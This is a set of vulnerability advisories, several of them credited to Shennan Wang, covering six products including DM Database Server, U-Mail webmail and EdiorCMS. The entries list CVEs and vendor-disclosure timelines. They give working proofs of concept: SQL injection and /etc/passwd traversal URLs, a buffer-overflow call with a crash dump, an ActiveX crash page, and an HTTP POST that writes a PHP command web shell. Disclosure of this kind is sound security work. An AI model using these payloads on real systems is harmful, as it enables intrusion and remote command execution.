RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities

Vulnerable: v3.0.7.x 
Vendor:  www.rj-itop.com 
Category: Input Validation Error
Impact:   SQL injection

Details:
=========
Multiple SQL Injection Vulnerabilities has been found in DRJ-iTop Network \
Vulnerability Scanner System, which can be exploited by malicious users to \
conduct SQL injection and script insertion attacks. Authentication is required to \
exploit these vulnerabilities.

POC: 
=========
https://8.8.8.8/roleManager.jsp?type=query&id= [SQL Injection]
Timeline:
========
2009.10.19   Report to vendor (but vender did not respond)
2009.11.15   Report to vendor second times
2009.11.19   Report to CNNVD
2010.04.13   Public
 
 
DM Database Server Memory Corruption Vulnerability
========
Vulnerable:All Version
Vendor:www.dameng.com
Discovered by:Shennan Wang (HuaweiSymantec SRT)
CVE:CVE-2010-2159
Details:
=========
A vulnerability in DM Database Server all version allows attacker to execute \
arbitrary code or cause a DoS (Denial of Service).Authentication is required to exploit this vulnerability.
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.

POC: 
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for \
C:\dmdbms\bin\wdm_dll.dll -  wdm_dll+0xd1753:
100d1753 f2ae            repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc  "AAAAAAAAAAAAAAAAAAAA"

Timeline:
========
2010.04.17   Report to vendor,no response.
2010.05.31   Public
 
 

U-Mail Webmail Arbitrary File Write Vulnerability
==================================================
Vulnerable: U-Mail 4.91 
Vendors:www.comingchina.com
Category:   Input Validation Error
Impact:An attacker can write arbitrary data to new files.
Author:Shennan Wang
Date:2008-10-30
Web:http://hi.baidu.com/nansec
CVE:CVE-2008-4932
Details:

=========
This vulnerability allows remote attackers to write arbitrary file on vulnerable \
installations of U-Mail Webmail Server. Authentication is required to exploit this \
vulnerability.The specific flaw exists in the 'edit.php' file running on the U-Mail \
Webmail Server. A malicious HTTP POST request can write arbitrary file to the \
publicly accessible web directories.
Exploit:
=========
POST /webmail/modules/filesystem/edit.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, \
application/x-shockwave-flash, application/vnd.ms-excel, \
application/vnd.ms-powerpoint, application/msword, application/x-silverlight, \
application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, \
                application/x-ms-application, */*
Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR \
                2.0.50727; .NET CLR 3.0.04506.30)
Host: mail.d4rkn3t.cn
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; \
PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18


path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=<?system($_GET[cmd \
]);?>  

 
 

WkImgSrv.dll VERSION 7.03.0616.0
TEST ON IE7+XPSP2_CN
http://marc.info/?l=bugtraq&m=120845200813992&w=2


POC: 
<html>
<head>
  <title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
  <script language="JavaScript">
    function payload() {
var num = -1;
obj.WksPictureInterface = num;
 }
   </script>
</head>
 <body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
 </body>
</html>
 
 

Directory traversal in EdiorCMS V3.0 

Application:  EdiorCMS V3.0
Vendor:      http://www.edior.com
Versions:     3.0
Platforms:    ALL
Bug:          Directory traversal
Exploitation: remote
Date:         13 Mar 2008
Author:       Shennan Wang
              e-mail: wsn1983@gmail.com
POC:          http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd  
 
 

Vulnerable: v3.3.3
Vendor:  www.altn.com
Category: Environment Error


Vulnerable
========
Alt-N WebAdmin 3.3.3
U-Mail for Windows V9.8 
U-Mail GateWay for Windows V9.8


Details:
=========
A source code disclosure vulnerability exists with Alt-N WebAdmin Server.
Remote attacker can be exploited to disclose the source code by appending "%2e" or "%20" to a URI.
Test on U-Mail for Windows V9.8 and U-Mail GateWay for Windows V9.8


POC: 
=========
http://ip:1000/login.wdm%20
http://ip:1000/login.wdm%2e


Reference:
=========
www.comingchina.com/download.html
http://www.nansec.com/